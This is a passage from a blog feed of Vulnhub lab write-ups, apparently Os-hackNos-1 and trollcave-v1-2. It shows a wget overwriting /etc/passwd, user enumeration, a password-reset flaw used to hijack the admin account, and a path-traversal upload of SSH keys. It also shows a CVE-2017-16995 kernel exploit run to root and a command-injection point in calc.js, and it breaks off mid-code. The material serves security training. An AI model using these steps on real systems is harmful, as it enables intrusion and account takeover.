http://192.168.5.129:8000/passwd -O /etc/passwd</span><br></pre></td></tr></table></figure><p>然后在已有的shell中进行切换用户</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232454442.png" alt="image-20230628232454442"></p><figure class="highlight plaintext"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">root@hackNos:/var/www# cd ~</span><br><span class="line">cd ~</span><br><span class="line">root@hackNos:~# ls</span><br><span class="line">ls</span><br><span class="line">root.txt</span><br><span class="line">root@hackNos:~# cat root.txt</span><br><span class="line">cat root.txt</span><br><span class="line"> _ _ _ </span><br><span class="line"> _| || |_ | | </span><br><span class="line"> |_ __ _|______ _ __ ___ ___ | |_ </span><br><span class="line"> _| || |_|______|| '__|/ _ \ / _ \ | __|</span><br><span class="line"> |_ __ _| | | | (_) || (_) || |_ </span><br><span class="line"> |_||_| |_| \___/ \___/ \__|</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br><span class="line">Author : Rahul Gehlaut</span><br><span class="line"></span><br><span class="line">Linkedin : https://www.linkedin.com/in/rahulgehlaut/</span><br><span class="line"></span><br><span class="line">Blog : www.hackNos.com</span><br><span 
class="line"></span><br></pre></td></tr></table></figure><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>使用菜刀等webshell不能切换,因为su命令必须在终端中执行</p><p>su: must be run from a terminal</p><p><img src="/2023/10/21/Os-hackNos-1/image-20230628232523339.png" alt="image-20230628232523339"></p>]]></content>
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> Penetration testing </tag>
<tag> Privilege escalation </tag>
<tag> Linux </tag>
</tags>
</entry>
<entry>
<title>trollcave-v1-2</title>
<link href="/2023/10/21/trollcave-v1-2/"/>
<url>/2023/10/21/trollcave-v1-2/</url>
<content type="html"><![CDATA[<h1 id="trollcave-v1-2"><a href="#trollcave-v1-2" class="headerlink" title="trollcave-v1-2"></a>trollcave-v1-2</h1><p>Target address: <a href="https://www.vulnhub.com/entry/trollcave-12,230/">Trollcave: 1.2 ~ VulnHub</a></p><p>The goal is the root user's <strong>flag.txt</strong>.</p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="Target setup"></a>Target setup</h2><p>For the target's network interface configuration, see my earlier post <a href="https://blog.csdn.net/witwitwiter/article/details/119889384?spm=1001.2014.3001.5501">Os-hackNos-1 (witwitwiter's blog on CSDN)</a>.</p><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="Penetration testing"></a>Penetration testing</h2><p>Port scan with nmap:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -sV 192.168.5.136 </span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 09:22 CST</span><br><span class="line">Nmap scan report for 192.168.5.136 (192.168.5.136)</span><br><span class="line">Host is up (0.00029s latency).</span><br><span class="line">Not shown: 998 filtered ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open http nginx 1.10.3 (Ubuntu)</span><br><span class="line">MAC Address: 00:0C:29:92:E4:A8 (VMware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Port 80 is open.</p><p>Next, run a directory scan with <code>dirsearch</code>:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">└─# dirsearch -u "http://192.168.5.136/"</span><br><span class="line"></span><br><span class="line"> _|. _ _ _ _ _ _|_ v0.4.1</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877</span><br><span class="line"></span><br><span class="line">Output File: /root/.dirsearch/reports/192.168.5.136/_21-09-02_21-14-34.txt</span><br><span class="line"></span><br><span class="line">Error Log: /root/.dirsearch/logs/errors-21-09-02_21-14-34.log</span><br><span class="line"></span><br><span class="line">Target: http://192.168.5.136/</span><br><span class="line"></span><br><span class="line">[21:14:34] Starting: </span><br><span class="line">[21:14:38] 200 - 2KB - /404 </span><br><span class="line">[21:14:38] 200 - 2KB - /404.html </span><br><span class="line">[21:14:38] 200 - 1KB - /500 </span><br><span class="line">[21:14:42] 302 - 92B - /admin -> http://192.168.5.136/login </span><br><span class="line">[21:14:42] 302 - 92B - /admin.aspx -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.jsp -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.conf -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.cgi -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.php -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.js -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.asp -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.cfm -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.dll -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.dat -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.html -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.htm -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.exe -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.ex -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.do -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.old -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.epc -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.mdb -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.passwd -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.py -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.php3 -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.pl -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.mvc -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.woa -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.rb -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin/ -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.shtml -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin/?/login -> http://192.168.5.136/login</span><br><span class="line">[21:14:42] 302 - 92B - /admin.srf -> http://192.168.5.136/login</span><br><span class="line">[21:14:49] 302 - 92B - /comments -> http://192.168.5.136/login </span><br><span class="line">[21:14:51] 200 - 0B - /favicon.ico </span><br><span class="line">[21:14:55] 200 - 2KB - /login.jsp </span><br><span class="line">[21:14:55] 200 - 2KB - /login.php</span><br><span class="line">[21:14:55] 200 - 2KB - /login.aspx</span><br><span class="line">[21:14:55] 200 - 2KB - /login</span><br><span class="line">[21:14:55] 200 - 2KB - /login.asp</span><br><span class="line">[21:14:55] 200 - 2KB - /login.html</span><br><span class="line">[21:14:55] 200 - 2KB - /login.cgi</span><br><span class="line">[21:14:55] 200 - 2KB - /login.pl</span><br><span class="line">[21:14:55] 200 - 707B - /login.js</span><br><span class="line">[21:14:55] 500 - 48B - /login.json</span><br><span class="line">[21:14:55] 200 - 2KB - /login.py</span><br><span class="line">[21:14:55] 200 - 2KB - /login.rb</span><br><span class="line">[21:14:55] 200 - 2KB - /login.htm </span><br><span class="line">[21:14:55] 200 - 2KB - /login.shtml </span><br><span class="line">[21:14:55] 200 - 2KB - /login.srf </span><br><span class="line">[21:14:55] 200 - 2KB - /login.wdm%20 </span><br><span class="line">[21:14:55] 200 - 2KB - /login/ </span><br><span class="line">[21:14:59] 302 - 87B - /register.html -> http://192.168.5.136/ </span><br><span class="line">[21:14:59] 302 - 87B - /register.jsp -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 87B - /register -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 87B - /register.js -> http://192.168.5.136/ </span><br><span class="line">[21:14:59] 302 - 87B - /register.aspx -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 87B - /register.php -> http://192.168.5.136/</span><br><span class="line">[21:14:59] 302 - 92B - /reports -> http://192.168.5.136/login </span><br><span class="line">[21:14:59] 200 - 202B - /robots.txt </span><br><span class="line">[21:15:02] 302 - 92B - /users.js -> http://192.168.5.136/login </span><br><span class="line">[21:15:03] 302 - 92B - /users.csv -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.html -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.aspx -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.php -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.ini -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.jsp -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.mdb -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.json -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.db -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.sqlite -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.sql -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.pwd -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.log -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.xls -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users/ -> http://192.168.5.136/login</span><br><span class="line">[21:15:03] 302 - 92B - /users.txt -> http://192.168.5.136/login</span><br><span class="line"> </span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure><p>There appear to be both PHP and JSP environments, so try visiting login.</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231357999.png" alt="image-20230628231357999"></p><p>A login page. Next to it are the newest users and the users currently online. Clicking a user shows a number appended to the end of the URL; after a few clicks, the newest user turns out to be 17, so iterating over 1 to 17 enumerates every user's information.</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231421655.png" alt="image-20230628231421655"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">King:Superadmin</span><br><span class="line">dave:Admin</span><br><span class="line">dragon:Admin</span><br><span class="line">coderguy:Admin</span><br><span class="line">cooldude89:Moderator</span><br><span class="line">Sir:Moderator</span><br><span class="line">Q:Moderator</span><br><span class="line">teflon:Moderator</span><br><span class="line">TheDankMan:Regular member</span><br><span class="line">artemus:Regular member</span><br><span class="line">MrPotatoHead:Regular member</span><br><span class="line">Ian:Regular member</span><br><span class="line">kev:Member</span><br><span class="line">notanother:Member</span><br><span class="line">anybodyhome:Member</span><br><span class="line">onlyme:Member</span><br><span class="line">xer:Member</span><br></pre></td></tr></table></figure><p>We can see there is a Superadmin user.</p><p>Looking through various references leads to <code>https://github.com/rails/rails</code>.</p><p>Installing Rails creates a user named rails. The site also has a password reset feature at <code>http://192.168.5.136/password_resets/new</code>.</p><p>Requesting a reset for the king user directly returns an error, while requesting one for the xer user yields the following link: <code>http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=xer</code></p><p>Visiting this link lets us reset xer's password.</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231500201.png" alt="image-20230628231500201"></p><p>But if we change <code>http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=xer</code> to <code>http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=King</code>, trying to exploit the logic flaw to reset King's password,</p><p>the reset goes straight through.</p><p>After logging in, uploading a file in the file manager is not allowed; the admin panel has an option that enables uploads.</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231519398.png" alt="image-20230628231519398"></p><p>A JSP webshell generated with Godzilla uploads to the server, but visiting it shows it is not executed.</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231533945.png" alt="image-20230628231533945"></p><p>So try uploading an SSH key instead.</p><p>First generate an SSH key pair:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -f rails</span><br><span class="line">mv rails.pub authorized_keys</span><br></pre></td></tr></table></figure><p>Upload it to <code>/home/rails/.ssh/</code>.</p><p>The upload path has to use <code>../../../../../</code> to traverse up to the root directory, so the upload path is <code>../../../../../../../home/rails/.ssh/authorized_keys</code>.</p><p>Then log in over SSH:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mv rails id_rsa-rails</span><br><span class="line">chmod 600 id_rsa-rails</span><br><span class="line">ssh -i id_rsa-rails rails@192.168.5.136</span><br></pre></td></tr></table></figure><p>After getting access, check the system information:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ uname -a</span><br><span class="line">Linux trollcave 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux</span><br><span class="line">$ cat /etc/lsb-release</span><br><span class="line">DISTRIB_ID=Ubuntu</span><br><span class="line">DISTRIB_RELEASE=16.04</span><br><span class="line">DISTRIB_CODENAME=xenial</span><br><span class="line">DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="CVE-2017-16995提权"><a href="#CVE-2017-16995提权" class="headerlink" title="Privilege escalation with CVE-2017-16995"></a>Privilege escalation with CVE-2017-16995</h4><p>The exploit is found at <a href="https://www.exploit-db.com/exploits/45010">https://www.exploit-db.com/exploits/45010</a>:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc cve.c -o cve</span><br></pre></td></tr></table></figure><p>After uploading it to the server:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">$ chmod 777 cve</span><br><span class="line">$ ./cve</span><br><span class="line">[.] </span><br><span class="line">[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)</span><br><span class="line">[.] </span><br><span class="line">[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **</span><br><span class="line">[.] </span><br><span class="line">[*] creating bpf map</span><br><span class="line">[*] sneaking evil bpf past the verifier</span><br><span class="line">[*] creating socketpair()</span><br><span class="line">[*] attaching bpf backdoor to socket</span><br><span class="line">[*] skbuff => ffff88002b580900</span><br><span class="line">[*] Leaking sock struct from ffff880028f0e000</span><br><span class="line">[*] Sock->sk_rcvtimeo at offset 472</span><br><span class="line">[*] Cred structure at ffff88002f01b900</span><br><span class="line">[*] UID from cred structure: 1001, matches the current: 1001</span><br><span class="line">[*] hammering cred structure at ffff88002f01b900</span><br><span class="line">[*] credentials patched, launching shell...</span><br><span class="line"># id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),1001(rails)</span><br><span class="line"># cat /root/flag.txt</span><br><span class="line">et tu, dragon?</span><br><span class="line"></span><br><span class="line">c0db34ce8adaa7c07d064cc1697e3d7cb8aec9d5a0c4809d5a0c4809b6be23044d15379c5</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="利用suid提权"><a href="#利用suid提权" class="headerlink" title="Privilege escalation via SUID"></a>Privilege escalation via SUID</h4><p>First switch to bash, then use <code>netstat -natpl</code> to look at the listening ports:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:~$ netstat -natpl</span><br><span class="line">(Not all processes could be identified, non-owned process info</span><br><span class="line"> will not be shown, you would have to be root to see it all.)</span><br><span class="line">Active Internet connections (servers and established)</span><br><span class="line">Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name</span><br><span class="line">tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 1065/ruby2.3 </span><br><span class="line">tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 127.0.0.1:55716 127.0.0.1:80 ESTABLISHED 1450/ruby </span><br><span class="line">tcp 0 0 127.0.0.1:55714 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55744 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55728 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 
127.0.0.1:55960 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55720 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55950 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55724 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 192.168.5.136:60830 91.189.91.38:80 ESTABLISHED - </span><br><span class="line">tcp 0 0 127.0.0.1:55958 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55946 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55962 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 192.168.5.136:22 192.168.5.129:45382 ESTABLISHED - </span><br><span class="line">tcp 0 0 127.0.0.1:55968 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55954 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55682 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 192.168.5.136:58824 91.189.91.38:80 CLOSE_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55974 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55738 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:80 127.0.0.1:55716 ESTABLISHED - </span><br><span class="line">tcp 0 0 127.0.0.1:55964 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55970 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp6 0 0 :::22 :::* LISTEN - </span><br><span class="line">tcp6 0 0 ::1:5432 :::* LISTEN - </span><br><span class="line">tcp6 0 0 ::1:50978 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:51680 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51680 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:51666 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:51678 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:51682 
::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51682 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51666 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51678 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:50978 ESTABLISHED - </span><br></pre></td></tr></table></figure><p>使用<code>Shift + ~ +C</code>切换到ssh,然后使用<code>-L 8888:LOCALHOST:8888</code>将8888端口转发至本地</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231554695.png" alt="image-20230628231554695"></p><p>使用<code> find / -name calc -print 2>&1| grep -v "Permission denied"</code>查找calc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:~$ find / -name calc -print 2>&1| grep -v "Permission denied"</span><br><span class="line">/usr/src/linux-headers-4.4.0-116-generic/include/config/can/calc</span><br><span class="line">/usr/src/linux-headers-4.4.0-97-generic/include/config/can/calc</span><br><span class="line">/home/king/calc</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>查看calc,发现里面有个calc.js,其中的内容为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 
class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:~$ cat /home/king/calc/calc.js </span><br><span class="line">var http = require("http");</span><br><span class="line">var url = require("url");</span><br><span class="line">var sys = require('sys');</span><br><span class="line">var exec = require('child_process').exec;//此处有命令执行漏洞</span><br><span class="line"></span><br><span class="line">// Start server</span><br><span class="line">function start(route)</span><br><span class="line">{</span><br><span class="line"> function onRequest(request, response)</span><br><span class="line"> {</span><br><span class="line"> var theurl = url.parse(request.url);</span><br><span class="line"> var pathname = theurl.pathname;</span><br><span class="line"> var query = theurl.query; </span><br><span class="line"> console.log("Request for " + pathname + query + " received.");</span><br><span class="line"> route(pathname, request, query, response);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">http.createServer(onRequest).listen(8888, '127.0.0.1');</span><br><span class="line">console.log("Server started");</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// Route request</span><br><span class="line">function route(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> console.log("About to route request for " + pathname);</span><br><span class="line"> switch (pathname)</span><br><span class="line"> {</span><br><span class="line"> // security risk</span><br><span class="line"> /*case 
